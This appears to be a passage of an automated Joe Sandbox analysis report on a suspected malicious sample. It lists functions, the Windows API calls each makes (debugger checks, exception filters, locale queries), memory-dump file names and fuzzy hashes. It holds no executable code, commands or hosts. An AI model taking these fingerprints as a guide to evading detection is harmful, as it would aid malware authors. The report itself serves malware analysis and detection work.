                            • Opcode Fuzzy Hash: c978cbae2d2b2e7e34fda7347b027cb190bd780ef1dc569dc29ed165eb3e7d8e
                            • Instruction Fuzzy Hash: 18023D71E01619DBDF19CFA8D8806EDBBB1FF88314F258169D515E7380D731AA41CB90
                            APIs
                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0030D785
                            • IsDebuggerPresent.KERNEL32 ref: 0030D851
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0030D86A
                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0030D874
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                            • String ID:
                            • API String ID: 254469556-0
                            • Opcode ID: 5c2afbd85ccf532ed32094d824a6c3c9af47e359ee76c67c4616d690a18fcce5
                            • Instruction ID: 165f6e031bfc34d3b816bf2b4022ca7393cda3470142623e4c273b8307139f79
                            • Opcode Fuzzy Hash: 5c2afbd85ccf532ed32094d824a6c3c9af47e359ee76c67c4616d690a18fcce5
                            • Instruction Fuzzy Hash: CA31D875D05218DBDF21DFA4D9497CDBBB8BF08704F1041AAE40DAB290E7719A858F45
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0032239F
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003223E9
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003224AF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: InfoLocale$ErrorLast
                            • String ID:
                            • API String ID: 661929714-0
                            • Opcode ID: 595e1ae483105a9f95fab70caa4ab5a67b44a1841443f0938b2cd8100fa5dbbf
                            • Instruction ID: c4f9d6e336f944af8c8ef981b346bf6d0afd2cc7d7df00fff1559dadc00e9a47
                            • Opcode Fuzzy Hash: 595e1ae483105a9f95fab70caa4ab5a67b44a1841443f0938b2cd8100fa5dbbf
                            • Instruction Fuzzy Hash: 3E61C271950127AFEB2AEF29EC92BABB7A8EF04300F118179ED05C6581E774DD81CB50
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 003116DB
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 003116E5
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 003116F2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: 6b3c9854306eea2cd10dc76ff69f0b421cb2645dfca2b3030042cf272640e821
                            • Instruction ID: a01f51c1d65952d47ff8eae541b638a73ebbbe6030ab26130a888dead40f5e57
                            • Opcode Fuzzy Hash: 6b3c9854306eea2cd10dc76ff69f0b421cb2645dfca2b3030042cf272640e821
                            • Instruction Fuzzy Hash: EE31C374911228ABCB22DF68D8897CCBBB8BF08710F5045EAE41CA7291E7709F818F45
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?,003059B9,00000000,00000000), ref: 003138CE
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003138ED
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 1518329722-0
                            • Opcode ID: 1f8b7d6958c2185181b5fb7862bb88f196e35870d9d5196b5879b927da283c31
                            • Instruction ID: 3b664e52c546ad1fac2c542508e575d4950f8be673b39c125e339c0c013da878
                            • Opcode Fuzzy Hash: 1f8b7d6958c2185181b5fb7862bb88f196e35870d9d5196b5879b927da283c31
                            • Instruction Fuzzy Hash: 61F0F4B1A00118BB4B29CF6D8804ADEBEEDEBC93707258259E819E7340D6B0CE41C690
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0z-1$z-1
                            • API String ID: 0-2286291861
                            • Opcode ID: f05cc9cb2b648b8057d755e897dfcd2b0930626eb8c498e6cff64f67a484ca15
                            • Instruction ID: f9d7f5900fcb0a2f5cbead7c964f69db96792ed0061a778b033b27c6f9267d99
                            • Opcode Fuzzy Hash: f05cc9cb2b648b8057d755e897dfcd2b0930626eb8c498e6cff64f67a484ca15
                            • Instruction Fuzzy Hash: 07C1BD309006469FCB2EDF68C9846FABBF5AF0D300F154A29D4579BA91C731AEC6CB51
                            APIs
                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0031B4CA,?,?,00000008,?,?,0032708B,00000000), ref: 0031B6FC
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ExceptionRaise
                            • String ID:
                            • API String ID: 3997070919-0
                            • Opcode ID: 1433bf5c82515d58cf8f477758c3b56c6ac7103995a4b7ce07ba753add8e1666
                            • Instruction ID: 868af986f099a9cdf8e3826888c5fa09769cfdc18a1ec36ca190e3a38c1f8315
                            • Opcode Fuzzy Hash: 1433bf5c82515d58cf8f477758c3b56c6ac7103995a4b7ce07ba753add8e1666
                            • Instruction Fuzzy Hash: 29B13031510609DFD71ACF28C48ABA5BBE1FF49364F2A8658E899CF2E1C335D991CB40
                            APIs
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0030D2B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: FeaturePresentProcessor
                            • String ID:
                            • API String ID: 2325560087-0
                            • Opcode ID: e2fcb0c0681811faa579b162a6da20272c8d6a359b875ef9e5a8fcb26cfe0d8f
                            • Instruction ID: 7e0cd61c8306313d41cf3fe23cd68c25a894887a34236e3cd622d5366b427dfd
                            • Opcode Fuzzy Hash: e2fcb0c0681811faa579b162a6da20272c8d6a359b875ef9e5a8fcb26cfe0d8f
                            • Instruction Fuzzy Hash: ADA1A0B9E112058FDB2ACF99E9D169DBBF4FB49314F15812AD815EB3A1C3349940CF90
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 132b80a9e25dc5bd74b1979453bb12e8d2433b99222c17f7877a2717289312c0
                            • Instruction ID: 9cfca902f8f3b0bc92b7737cb3674bda5624ceb01d56b990bd5b0d7671c50a11
                            • Opcode Fuzzy Hash: 132b80a9e25dc5bd74b1979453bb12e8d2433b99222c17f7877a2717289312c0
                            • Instruction Fuzzy Hash: E031D776900219AFDB25DFB8CC85DEBB76DEB88354F154569F80597141EA30AD808B50
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003225F2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ErrorLast$InfoLocale
                            • String ID:
                            • API String ID: 3736152602-0
                            • Opcode ID: 3dd551594bf5d98548fbcccd828ae398e1c22ebfdbf548226fde00341a4e2bd8
                            • Instruction ID: 6516729cf93b55d8fc961e0ad74c27f45684e1cc7ca48a0e191d438e5039e931
                            • Opcode Fuzzy Hash: 3dd551594bf5d98548fbcccd828ae398e1c22ebfdbf548226fde00341a4e2bd8
                            • Instruction Fuzzy Hash: 50219232611216BFDB2A9A65EC52ABB73ACEF44710F10417AFD02DA141EBB4ED51CB50
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • EnumSystemLocalesW.KERNEL32(0032234B,00000001,00000000,?,-00000050,?,0032297F,00000000,?,?,?,00000055,?), ref: 00322297
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem
                            • String ID:
                            • API String ID: 2417226690-0
                            • Opcode ID: 0c983bb050a5765f8f3483bfd3845a5905ea3b4c42c394fbbcbf33bd343dcfcc
                            • Instruction ID: e3d81b8a44b11d3656007d89a6bf31b340a336e4457fffad3be078d08ea3b407
                            • Opcode Fuzzy Hash: 0c983bb050a5765f8f3483bfd3845a5905ea3b4c42c394fbbcbf33bd343dcfcc
                            • Instruction Fuzzy Hash: DF11E93A204701AFDB199F39DC916BBB791FF84358B15482DEA4787B40D776A943C740
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00322567,00000000,00000000,?), ref: 003227F9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ErrorLast$InfoLocale
                            • String ID:
                            • API String ID: 3736152602-0
                            • Opcode ID: afe60a5e1595b110ac790819ad5dbef2b89ca4150853f67be08e1f5598083883
                            • Instruction ID: addafe50b24f26b30630bf6869e99e0ba1e750f12ca52ce8ad9734fbd71d896f
                            • Opcode Fuzzy Hash: afe60a5e1595b110ac790819ad5dbef2b89ca4150853f67be08e1f5598083883
                            • Instruction Fuzzy Hash: D401F437A10222BBDB2D9A249C16FFB7768EF40754F164429ED4AE7180EA34FE41C6D0
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • EnumSystemLocalesW.KERNEL32(0032259E,00000001,00000000,?,-00000050,?,00322947,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0032230A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem
                            • String ID:
                            • API String ID: 2417226690-0
                            • Opcode ID: 03ebf65950737797f0fdd651f4521b79b361d209c7c3ce0d957051c71880d174
                            • Instruction ID: 37b65c936d0cce84af123727d372645e978bd5fa0104832fdfbd45dcb1ce08ba
                            • Opcode Fuzzy Hash: 03ebf65950737797f0fdd651f4521b79b361d209c7c3ce0d957051c71880d174
                            • Instruction Fuzzy Hash: 29F0463A2003046FCB269F35AC81B7BBB90EF80768F15842DFA028B680C775AC42C790
                            APIs
                              • Part of subcall function 00313A77: EnterCriticalSection.KERNEL32(?,?,0031643D,00000000,0033D530,0000000C,00316405,?,?,0031971A,?,?,0031954E,00000001,00000364,?), ref: 00313A86
                            • EnumSystemLocalesW.KERNEL32(0031A9D3,00000001,0033D710,0000000C,0031AD8C,00000000), ref: 0031AA18
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CriticalEnterEnumLocalesSectionSystem
                            • String ID:
                            • API String ID: 1272433827-0
                            • Opcode ID: 0c5ed4d7602a13891f3093819ea4eacf8cc3ae639095d5e192d100e1939b2c77
                            • Instruction ID: a9aeab5354eb0a20463cebe3ece6e7513b00d4b380ed1444fe058348b2b4bfb0
                            • Opcode Fuzzy Hash: 0c5ed4d7602a13891f3093819ea4eacf8cc3ae639095d5e192d100e1939b2c77
                            • Instruction Fuzzy Hash: C3F04976A50604DFD70ADF98E842B9D77F4FB09722F00812AF511DB2A1DB7559818F80
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • EnumSystemLocalesW.KERNEL32(00322133,00000001,00000000,?,?,003229A1,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00322211
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem
                            • String ID:
                            • API String ID: 2417226690-0
                            • Opcode ID: 5b74d54fda6e86b7c873194e6ab3f0de3df2b40d1f5141e395f61bc9adfad949
                            • Instruction ID: 0af98fe328fc3887dc8c8f65f2281b5619d98c29fc6b7f6567a421f7bfcbfa14
                            • Opcode Fuzzy Hash: 5b74d54fda6e86b7c873194e6ab3f0de3df2b40d1f5141e395f61bc9adfad949
                            • Instruction Fuzzy Hash: ADF0203A300214A7CB069F35EC05BABBB94EBC1750B068059EE068B291C672A842C7D0
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0031842A,?,20001004,00000000,00000002,?,?,00317A1C), ref: 0031AEC4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: b4374d60f6d30f01b4b06eefa9082f00c957c2e8df3b5ab04391bcd9d6ab0853
                            • Instruction ID: d8fb5c162b71a5709c5856822f367107df02eeb8908fd5001796e7875313bd28
                            • Opcode Fuzzy Hash: b4374d60f6d30f01b4b06eefa9082f00c957c2e8df3b5ab04391bcd9d6ab0853
                            • Instruction Fuzzy Hash: 1EE04F31501518BBCF2B2F61DC09EEE7E1AEF4C751F014014FD0566121CB718D61AAE1
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000D911,0030D100), ref: 0030D90A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: cbfd3b8fba67218ba40266a844e73e9650cf64b7d5370c6f05e63f75a347c8ce
                            • Instruction ID: 329dd14aad91adb5181505f1196a27c02671cd16ab631c8c13b7d2d32f5b2d57
                            • Opcode Fuzzy Hash: cbfd3b8fba67218ba40266a844e73e9650cf64b7d5370c6f05e63f75a347c8ce
                            • Instruction Fuzzy Hash:
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID: ~~~~~~~~
                            • API String ID: 0-3303759636
                            • Opcode ID: f8f2d961c6690bde5257882181bc010ca5d15dd02701106ccb974acb415ca544
                            • Instruction ID: 22bcf7a22f73fd2b71cb357ec7340c1717cf5900722a29e7853b116216d2c4ed
                            • Opcode Fuzzy Hash: f8f2d961c6690bde5257882181bc010ca5d15dd02701106ccb974acb415ca544
                            • Instruction Fuzzy Hash: 5FA1E235905646CFD726CF24C468BF6F3B0FF55704F0A82E9D8496B2A2EB706981CB84
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: HeapProcess
                            • String ID:
                            • API String ID: 54951025-0
                            • Opcode ID: 6400cb917b6eaa0b882eca85984b531dd2b4e5ad11aa88e74a959105f5ee8559
                            • Instruction ID: dacc3ef51bc94f71f0cc3884ebca8dc4d639bf57e06347a983bab37c51afeab3
                            • Opcode Fuzzy Hash: 6400cb917b6eaa0b882eca85984b531dd2b4e5ad11aa88e74a959105f5ee8559
                            • Instruction Fuzzy Hash: 2FA012343005018B93414F315E0560C359C65063C0B0540189510C4120DA3050A14601
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 505ec60201b935deb26aca79220dbf4afa4b9f889aed919791c54395606646be
                            • Instruction ID: 24d1ee0faf4dde827e485a0331e6fd42a22a55fe0de7fef30d0ec2ab62465de3
                            • Opcode Fuzzy Hash: 505ec60201b935deb26aca79220dbf4afa4b9f889aed919791c54395606646be
                            • Instruction Fuzzy Hash: 60323731D2AF510DD7639738E862335A24CAFB73C4F65D727E826B5AA6EF2994C34100
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ff73776b8a4b52318948c1afd28b6513f75bd478226d09df3f171f2496f895b
                            • Instruction ID: 780130c149e9f8717821bacb7e70e556bc535ed686b22887cb524b702a04354c
                            • Opcode Fuzzy Hash: 6ff73776b8a4b52318948c1afd28b6513f75bd478226d09df3f171f2496f895b
                            • Instruction Fuzzy Hash: DE323432D28F114ED7239638ED62335A25DAFB73C5F15C727E81AB59A9EB29C4834102
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
